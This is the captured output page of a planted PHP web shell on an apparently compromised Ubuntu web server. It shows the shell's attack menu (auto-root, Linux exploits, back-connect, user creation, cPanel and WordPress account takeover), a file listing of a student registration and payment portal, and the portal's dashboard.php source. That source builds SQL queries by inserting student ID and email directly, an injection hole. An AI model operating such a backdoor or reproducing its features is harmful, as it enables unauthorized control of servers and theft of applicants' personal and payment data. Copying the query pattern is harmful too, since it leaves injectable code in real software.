Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
conreg /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
bower_components
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
dist
[ DIR ]
drwxr-xr-x
documents
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
mailer
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
uploadDoc
[ DIR ]
drwxr-xr-x
validation
[ DIR ]
drwxr-xr-x
404.php
2.86
KB
-rw-r--r--
changePassword.php
4.67
KB
-rw-r--r--
class.user.php
3.69
KB
-rw-r--r--
common-oldbkp.php
5.19
KB
-rw-r--r--
common.php
5.99
KB
-rw-r--r--
config.php
296
B
-rw-r--r--
dashboard.php
7.11
KB
-rw-r--r--
dbconfig.php
1.31
KB
-rw-r--r--
error_log
5.69
KB
-rw-r--r--
forgotPassword.php
5.28
KB
-rw-r--r--
fpass.php
3.11
KB
-rw-r--r--
google_auth.php
2.06
KB
-rw-r--r--
index-login-bkp.php
5.62
KB
-rw-r--r--
index.php
11.97
KB
-rw-r--r--
logout.php
645
B
-rw-r--r--
logoutgmail.php
977
B
-rw-r--r--
page-top.php
5.8
KB
-rw-r--r--
pay-bkp15722.php
8.49
KB
-rw-r--r--
pay-oldbkp.php
5.39
KB
-rw-r--r--
pay.php
5.15
KB
-rw-r--r--
payNow-oldbkp.php
7.07
KB
-rw-r--r--
payNow.php
7.13
KB
-rw-r--r--
payNowLink-bkp15722.php
10.56
KB
-rw-r--r--
payNowLink.php
8.1
KB
-rw-r--r--
paymentlinkcn.php
7.95
KB
-rw-r--r--
paymentlinkcoa.php
8.33
KB
-rw-r--r--
paymentlinkcyber.php
7.95
KB
-rw-r--r--
paymentlinkdm.php
7.95
KB
-rw-r--r--
paymentlinkds.php
7.95
KB
-rw-r--r--
paymentlinkip.php
8.31
KB
-rw-r--r--
paymentlinkml.php
8.28
KB
-rw-r--r--
paymentlinkos.php
8.28
KB
-rw-r--r--
personalInformations-bkp15722....
16.31
KB
-rw-r--r--
personalInformations.php
19.12
KB
-rw-r--r--
register.php
18.78
KB
-rw-r--r--
registrationVerify.php
2.5
KB
-rw-r--r--
resetpass.php
5.27
KB
-rw-r--r--
verify-bkp15722.php
12.67
KB
-rw-r--r--
verify-oldbkp.php
7.15
KB
-rw-r--r--
verify.php
9.26
KB
-rw-r--r--
viewStudentDetails.php
18.73
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : dashboard.php
<?php ob_start(); require __DIR__ . DIRECTORY_SEPARATOR . "lib" . DIRECTORY_SEPARATOR . "config.php"; // HTML require PATH_LIB . "page-top.php"; $studentID = $row[ 'studentID' ]; //$tokenAuth = $row[ 'authtokenid' ]; require_once 'common.php'; $studentDetails = new STUDENT(); $emailID = $row[ 'studentEmail' ]; ?> <script type="text/javascript">//<![CDATA[ window.onload=function(){ } //]]></script> <script > function printDiv(divName) { var printContents = document.getElementById(divName).innerHTML; var originalContents = document.body.innerHTML; document.body.innerHTML = printContents; window.print(); document.body.innerHTML = originalContents; } </script> <!-- Content Wrapper. Contains page content --> <div class="content-wrapper"> <!-- Content Header (Page header) --> <section class="content-header"> <h1> Dashboard <!--<small>Control panel</small> --> </h1> <ol class="breadcrumb"> <li><a href="#"><i class="fa fa-dashboard"></i> Home</a></li> <li class="active">Dashboard</li> </ol> </section> <section class="content"> <?php $stmt1 = $studentDetails->runQuery( "SELECT * FROM personalinformation WHERE studentID='$studentID'" ); $stmt1->execute( array( ":studentID1" => $studentID ) ); $row2 = $stmt1->fetch( PDO::FETCH_ASSOC ); $formStatus = $row2['formStatus']; $stmt2 = $studentDetails->runQuery( "SELECT * FROM applicationfees WHERE studentID=:studentID1 and emailID='$emailID'" ); $stmt2->execute( array( ":studentID1" => $studentID ) ); $row3 = $stmt2->fetch( PDO::FETCH_ASSOC ); ?> <div class="row"> <div class="col-xs-12" style="padding-left: 0px; padding-right: 0px;"> <div class="box"> <!-- /.box-header --> <?php if($formStatus =="APPLIED"){ ?> <!--<div class="box-header"> <h3 class="box-title"><strong>Application Details</strong></h3> </div> --> <div class="box-body" id="printableArea"> <center><table id="example1" class="table table-bordered table-striped" style=" width: 765px;"> <tr > <td colspan="2"><center><img src="https://www.iiitd.ac.in/sites/all/themes/impact_theme/logo.png"></center></td> </tr> <tr><td colspan="2" style="text-align:center; font-size:16px;"><strong>Application Details of CSEDU Program, IIIT-Delhi</strong></td></tr> <tr><td colspan="2" style="text-align:center; font-size:16px;"><strong>Module Registration Details</strong></td></tr> <tr> <td><strong>Application Number</strong></td> <td><?php $applicationNo = "CSEDU" . $studentID ; echo $applicationNo; ?></td> </tr> <!--<tr> <td><strong>Application Status</strong></td> <td><?php echo $row2['applicationStatus'] ?></td> </tr> --> <tr> <td><strong>Applicant Name</strong></td> <td><?php echo $row2['studentName'] ?></td> </tr> <tr> <td><strong>Email ID</strong></td> <td><?php echo $row2['emailID'] ?></td> </tr> <tr> <td><strong>Mobile Number</strong></td> <td><?php echo $row2['countryCode'] ?>-<?php echo $row2['mobileNumber'] ?></td> </tr> <tr> <td><strong>Institution Name</strong></td> <td><?php echo $row2['institutionName'] ?></td> </tr> <tr> <td><strong>Department</strong></td> <td><?php echo $row2['department'] ?></td> </tr> <tr> <td><strong>Your Title</strong></td> <td><?php echo $row2['yourTitle'] ?></td> </tr> <tr> <td><strong>Institution Type</strong></td> <td><?php echo $row2['institutionType'] ?></td> </tr> <tr> <td><strong>First Choice:</strong> Module you want to enroll in</td> <td><?php echo $row2['firstChoice'] ?></td> </tr> <tr> <td><strong>How many times you have taught this module</strong></td> <td><?php echo $row2['howManyTimes'] ?></td> </tr> <tr> <td><strong>Second Choice:</strong> Module you want to enroll in</td> <td><?php echo $row2['secondChoice'] ?></td> </tr> <tr> <td><strong>How many times you have taught this module</strong></td> <td><?php echo $row2['howManyTimes2'] ?></td> </tr> <tr><td colspan="2" style="text-align:center; font-size:16px;"><strong>Approver Details</strong></td></tr> <tr> <td><strong>Approver Email</strong></td> <td><?php echo $row2['approverEmail'] ?></td> </tr> <tr> <td><strong>Approver Title</strong></td> <td><?php echo $row2['approverTitle']; echo $row2['approverOtherTitle']; ?></td> </tr> <!--<tr> <td><strong>Approver Other Title</strong></td> <td><?php echo $row2['approverOtherTitle'] ?></td> </tr> --> <?php $feeID = $row3['feeID']; if($feeID <> ""){ ?> <tr><td colspan="2" style="text-align:center; font-size:16px;"><strong>Fee Details</strong></td></tr> <tr> <td><strong>Application Fee (Rs.)</strong></td> <td><?php echo $row3['applicationFeeAm'] ?></td> </tr> <tr> <td><label><strong>Fee Submission Date (yyyy-mm-dd h:m:s)</strong></label></td> <td><?php echo $row3['paymentdate'] ?></td> </tr> <tr> <td><strong>Order ID</strong></td> <td><?php echo $row3['razorpay_order_id'] ?></td> </tr> <tr> <td><strong>Payment ID</strong></td> <td><?php echo $row3['razorpay_payment_id']; ?></td> </tr> <tr> <td><strong>Fee Status</strong></td> <td><?php echo $row3['paymentStatus'] ?></td> </tr> <?php } ?> </table></center> <br/><center><button class="btn btn-primary hidden-print" onClick="printDiv('printableArea')"><span class="glyphicon glyphicon-print" aria-hidden="true"></span> Print</button></center> </div> <?php } else { ?> <div class="box-body">No Record Found. Please fill the form to get the details here. </div> <?php } ?> <!-- /.box-body --> </div> <!-- /.box --> </div> <!-- /.col --> </div> </section> </div> <script > function printDiv(divName) { var printContents = document.getElementById(divName).innerHTML; var originalContents = document.body.innerHTML; document.body.innerHTML = printContents; window.print(); document.body.innerHTML = originalContents; } </script> <?php ob_end_flush(); require PATH_LIB . "page-bottom.php"; ?>
Close